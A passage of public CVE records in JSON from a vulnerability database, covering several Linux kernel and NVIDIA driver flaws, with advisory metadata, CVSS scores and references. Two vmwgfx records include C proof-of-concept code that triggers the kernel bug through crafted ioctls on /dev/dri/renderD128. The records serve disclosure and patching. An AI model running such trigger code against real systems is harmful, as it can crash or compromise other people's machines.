arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=1;  \n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint handle=alloc_bo();\n  int sid =    create_surface();     \n  printf(\"%d\",sid);     \n    poc(handle,sid);            \n  \n}\n\n\n"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-120",
              "description": "CWE-120 Buffer Overflow",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-05-03T00:00:00",
        "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
        "shortName": "Anolis"
      },
      "references": [
        {
          "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071"
        },
        {
          "name": "DSA-5324",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://www.debian.org/security/2023/dsa-5324"
        },
        {
          "name": "[debian-lts-announce] 20230302 [SECURITY] [DLA 3349-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2023/03/msg00000.html"
        },
        {
          "name": "[debian-lts-announce] 20230503 [SECURITY] [DLA 3403-1] linux security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2023/05/msg00006.html"
        }
      ],
      "source": {
        "defect": [
          "https://bugzilla.openanolis.cn/show_bug.cgi?id=2071"
        ],
        "discovery": "INTERNAL"
      },
      "title": "There is an out-of-bounds write vulnerability in vmwgfx driver",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
    "assignerShortName": "Anolis",
    "cveId": "CVE-2022-36280",
    "datePublished": "2022-09-09T00:00:00",
    "dateReserved": "2022-09-07T00:00:00",
    "dateUpdated": "2024-08-03T10:00:04.335Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3640
Vulnerability from cvelistv5
Published
2022-10-21 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel Bluetooth l2cap_core.c l2cap_conn_del use after free
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:03.216Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=42cf46dea905a80f6de218e837ba4d4cc33d6979"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211944"
          },
          {
            "name": "FEDORA-2022-64ab9153c0",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OD7VWUT7YAU4CJ247IF44NGVOAODAJGC/"
          },
          {
            "name": "FEDORA-2022-65a0a3504a",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DGOIRR72OAFE53XZRUDZDP7INGLIC3E3/"
          },
          {
            "name": "FEDORA-2022-7aadaadebc",
            "tags": [
              "vendor-advisory",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XG2UPX3MQ7RKRJEUMGEH2TLPKZJCBU5C/"
          },
          {
            "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html"
          },
          {
            "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
            "tags": [
              "mailing-list",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability, which was classified as critical, was found in Linux Kernel. Affected is the function l2cap_conn_del of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211944."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-119",
              "description": "CWE-119 Memory Corruption -\u003e CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-12-24T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth-next.git/commit/?id=42cf46dea905a80f6de218e837ba4d4cc33d6979"
        },
        {
          "url": "https://vuldb.com/?id.211944"
        },
        {
          "name": "FEDORA-2022-64ab9153c0",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OD7VWUT7YAU4CJ247IF44NGVOAODAJGC/"
        },
        {
          "name": "FEDORA-2022-65a0a3504a",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DGOIRR72OAFE53XZRUDZDP7INGLIC3E3/"
        },
        {
          "name": "FEDORA-2022-7aadaadebc",
          "tags": [
            "vendor-advisory"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XG2UPX3MQ7RKRJEUMGEH2TLPKZJCBU5C/"
        },
        {
          "name": "[debian-lts-announce] 20221222 [SECURITY] [DLA 3244-1] linux-5.10 security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00031.html"
        },
        {
          "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update",
          "tags": [
            "mailing-list"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html"
        }
      ],
      "title": "Linux Kernel Bluetooth l2cap_core.c l2cap_conn_del use after free",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3640",
    "datePublished": "2022-10-21T00:00:00",
    "dateReserved": "2022-10-21T00:00:00",
    "dateUpdated": "2024-08-03T01:14:03.216Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2017-6259
Vulnerability from cvelistv5
Published
2017-07-27 00:00
Modified
2024-08-05 15:25
Severity
Summary
NVIDIA GPU Display Driver contains a vulnerability in the kernel mode layer handler where an incorrect detection and recovery from an invalid state produced by specific user actions may lead to denial of service.
References
Impacted products
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T15:25:48.498Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4525"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "NVIDIA GPU Display Driver",
          "vendor": "Nvidia Corporation",
          "versions": [
            {
              "status": "affected",
              "version": "All"
            }
          ]
        }
      ],
      "datePublic": "2017-07-27T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "NVIDIA GPU Display Driver contains a vulnerability in the kernel mode layer handler where an incorrect detection and recovery from an invalid state produced by specific user actions may lead to denial of service."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "Denial of Service",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-28T18:57:01",
        "orgId": "9576f279-3576-44b5-a4af-b9a8644b2de6",
        "shortName": "nvidia"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4525"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "psirt@nvidia.com",
          "DATE_PUBLIC": "2017-07-27T00:00:00",
          "ID": "CVE-2017-6259",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "NVIDIA GPU Display Driver",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "All"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Nvidia Corporation"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "NVIDIA GPU Display Driver contains a vulnerability in the kernel mode layer handler where an incorrect detection and recovery from an invalid state produced by specific user actions may lead to denial of service."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "Denial of Service"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://nvidia.custhelp.com/app/answers/detail/a_id/4525",
              "refsource": "CONFIRM",
              "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4525"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "9576f279-3576-44b5-a4af-b9a8644b2de6",
    "assignerShortName": "nvidia",
    "cveId": "CVE-2017-6259",
    "datePublished": "2017-07-27T00:00:00",
    "dateReserved": "2017-02-23T00:00:00",
    "dateUpdated": "2024-08-05T15:25:48.498Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2024-1086
Vulnerability from cvelistv5
Published
2024-01-31 12:14
Modified
2024-08-01 18:26
Severity
Summary
Use-after-free in Linux kernel's netfilter: nf_tables component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:o:linux:linux_kernel:3.15:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "linux_kernel",
            "vendor": "linux",
            "versions": [
              {
                "lessThan": "6.8",
                "status": "affected",
                "version": "3.15",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-1086",
                "options": [
                  {
                    "Exploitation": "active"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-13T14:20:47.271139Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          },
          {
            "other": {
              "content": {
                "dateAdded": "2024-05-30",
                "reference": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=CVE-2024-1086"
              },
              "type": "kev"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-13T14:20:53.447Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-01T18:26:30.467Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://github.com/Notselwyn/CVE-2024-1086"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://news.ycombinator.com/item?id=39828424"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://pwning.tech/nftables/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2024/04/15/2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2024/04/10/23"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2024/04/10/22"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2024/04/14/1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2024/04/17/5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20240614-0009/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.8",
              "status": "affected",
              "version": "3.15",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Notselwyn"
        }
      ],
      "datePublic": "2024-01-24T19:02:39+00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s netfilter: nf_tables component can be exploited to achieve local privilege escalation.\n\nThe nft_verdict_init() function allows positive values as drop error within the hook verdict, and hence the nf_hook_slow() function can cause a double free vulnerability when NF_DROP is issued with a drop error which resembles NF_ACCEPT.\n\nWe recommend upgrading past commit f342de4e2f33e0e39165d8639387aa6c19dff660.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-01-31T12:14:34.073Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=f342de4e2f33e0e39165d8639387aa6c19dff660"
        },
        {
          "url": "https://kernel.dance/f342de4e2f33e0e39165d8639387aa6c19dff660"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7LSPIOMIJYTLZB6QKPQVVAYSUETUWKPF/"
        },
        {
          "url": "https://github.com/Notselwyn/CVE-2024-1086"
        },
        {
          "url": "https://news.ycombinator.com/item?id=39828424"
        },
        {
          "url": "https://pwning.tech/nftables/"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/04/15/2"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/04/10/23"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/04/10/22"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/04/14/1"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/04/17/5"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240614-0009/"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s netfilter: nf_tables component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2024-1086",
    "datePublished": "2024-01-31T12:14:34.073Z",
    "dateReserved": "2024-01-30T20:04:09.704Z",
    "dateUpdated": "2024-08-01T18:26:30.467Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-3526
Vulnerability from cvelistv5
Published
2022-10-16 00:00
Modified
2024-08-03 01:14
Severity
Summary
Linux Kernel skb macvlan.c macvlan_handle_frame memory leak
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T01:14:01.564Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/pabeni/net-next.git/commit/?id=e16b859872b87650bb55b12cca5a5fcdc49c1442"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://vuldb.com/?id.211024"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "A vulnerability classified as problematic was found in Linux Kernel. This vulnerability affects the function macvlan_handle_frame of the file drivers/net/macvlan.c of the component skb. The manipulation leads to memory leak. The attack can be initiated remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211024."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-404",
              "description": "CWE-404 Denial of Service -\u003e CWE-401 Memory Leak",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-10-16T00:00:00",
        "orgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
        "shortName": "VulDB"
      },
      "references": [
        {
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/pabeni/net-next.git/commit/?id=e16b859872b87650bb55b12cca5a5fcdc49c1442"
        },
        {
          "url": "https://vuldb.com/?id.211024"
        }
      ],
      "title": "Linux Kernel skb macvlan.c macvlan_handle_frame memory leak",
      "x_generator": "vuldb.com"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "1af790b2-7ee1-4545-860a-a788eba489b5",
    "assignerShortName": "VulDB",
    "cveId": "CVE-2022-3526",
    "datePublished": "2022-10-16T00:00:00",
    "dateReserved": "2022-10-16T00:00:00",
    "dateUpdated": "2024-08-03T01:14:01.564Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2022-36402
Vulnerability from cvelistv5
Published
2022-09-06 00:00
Modified
2024-08-03 10:00
Severity
Summary
There is an int overflow vulnerability in vmwgfx driver
References
Impacted products
VendorProduct
Linuxkernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-03T10:00:04.458Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "kernel",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "5.13.0-52*",
              "status": "affected",
              "version": "v4.3-rc1",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "value": "Ziming Zhang(ezrakiez@gmail.com) from Ant Group Light-Year Security Lab"
        }
      ],
      "datePublic": "2022-09-06T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "An integer overflow vulnerability was found in vmwgfx driver in drivers/gpu/vmxgfx/vmxgfx_execbuf.c in GPU component of Linux kernel with device file \u0027/dev/dri/renderD128 (or Dxxx)\u0027. This flaw allows a local attacker with a user account on the system to gain privilege, causing a denial of service(DoS)."
        }
      ],
      "exploits": [
        {
          "lang": "en",
          "value": "#include \u003cstdio.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cerrno.h\u003e\n\n#include \u003clinux/if_tun.h\u003e\n#include \u003cnet/if.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003csys/stat.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003csys/socket.h\u003e\n#include \u003cstring.h\u003e\n#include \u003cunistd.h\u003e\n#include \u003cstdlib.h\u003e\n#include \u003csys/ioctl.h\u003e\n#include \u003cerrno.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cfcntl.h\u003e\n#include \u003cpthread.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003csys/types.h\u003e\n#include \u003cstdint.h\u003e\n#include \u003cnetinet/ip.h\u003e\n#include \u003csys/resource.h\u003e\n#include \u003csys/syscall.h\u003e\n#include \u003climits.h\u003e\n#include \u003csys/mman.h\u003e\n\n#include \u003clinux/fs.h\u003e\nint fd = 0;\ntypedef struct mixer\n{\n\tint index;\n\tint fd;\n\tchar *msg;\n}mixer_t;\n\nstruct drm_vmw_surface_create_req {\n\t__u32 flags;\n\t__u32 format;\n\t__u32 mip_levels[6];\n\t__u64 size_addr;\n\t__s32 shareable;\n\t__s32 scanout;\n};\nstruct drm_vmw_execbuf_arg {\n\t__u64 commands;\n\t__u32 command_size;\n\t__u32 throttle_us;\n\t__u64 fence_rep;\n\t__u32 version;\n\t__u32 flags;\n\t__u32 context_handle;\n\t__s32 imported_fence_fd;\n};\nvoid init(){\nif ((fd = open(\"/dev/dri/renderD128\", O_RDWR)) == -1)\n                {\n                        printf(\"open tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n       \n}\nvoid poc(int sid){\nchar *vaddr=(unsigned long)mmap(NULL,\n               0x2000,\n                PROT_READ | PROT_WRITE,\n                MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE /* important */,\n-1, 0);\n\t\n\t if (mlock((void *)vaddr, 0x2000) == -1) {\n                printf(\"[-] failed to lock memory (%s), aborting!\\n\",\n                        strerror(errno));\n                        }\n                        \n          memset(vaddr,\"a\",0x2000);     \nint cmd[0x1000]={0};\ncmd[0]=1149;\ncmd[1]=0x50;\ncmd[2]=0x0;\ncmd[3]=0x0;\ncmd[4]=-1;\nstruct drm_vmw_execbuf_arg arg={0};\n\targ.commands=cmd;\n\targ.command_size=0x100;\n\targ.version=2;  \n\targ.context_handle=sid;\n                if (ioctl(fd, 0x4028644C, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n\n}\nint alloc_context(){\n\nint arg[0x10]={0};\narg[0]=0;\narg[1]=0x100;\n\nif (ioctl(fd, 0x80086447, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[0];         \n}\n\nint alloc_bo(){\n\nint arg[0x10]={0};\narg[0]=0x10000;\nif (ioctl(fd, 0xC0186441, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\n   return arg[2];         \n}\n\nint create_surface(){\nint buf[0x100]={0};\nbuf[0]=64;\nbuf[1]=64;\nbuf[2]=64;\n\nstruct drm_vmw_surface_create_req arg={0};\narg.flags=0;\narg.format=2;\narg.mip_levels[0]=1;\narg.size_addr=buf;\narg.shareable=0;\narg.scanout=0x10;\n\nif (ioctl(fd, 0xC0306449, \u0026arg) == -1)\n                {\n                        printf(\"ioctl tun failed: %s\\n\", strerror(errno));\n                        return -1;\n                }\nreturn arg.flags;\n}\nint main(int ac, char **argv)\n{\ninit();\nint cid=alloc_context();  \n  printf(\"%d\",cid);     \n    poc(cid);            \n  \n}"
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-118",
              "description": "CWE-118 Incorrect Access of Indexable Resource (\u0027Range Error\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2022-09-16T16:08:01",
        "orgId": "cb8f1db9-b4b1-487b-a760-f65c4f368d8e",
        "shortName": "Anolis"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072"
        }
      ],
      "source": {
        "defect": [
          "https://bugzilla.openanolis.cn/show_bug.cgi?id=2072"
        ],
        "discovery": "INTERNAL"
      },
      "title": "There is an int overflow vulnerability in vmwgfx driver",
      "x_generator": {
        "engine": "Vulnogram 0.0.9"
      },
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "AKA": "Anolis",
          "ASSIGNER": "security@openanolis.org",
          "DATE_PUBLIC": "2022-09-06T07:00:00.000Z",
          "ID": "CVE-2022-36402",
          "STATE": "PUBLIC",
          "TITLE": "There is an int overflow vulnerability in vmwgfx driver"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "kernel",
                      "version": {
                        "version_data": [
                          {
                            "version_affected": "\u003e=",
                            "version_name": "5.13.0-52",
                            "version_value": "v4.3-rc1"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "Linux"
              }
            ]
          }
        },
        "credit": [
          {
            "lang": "eng",
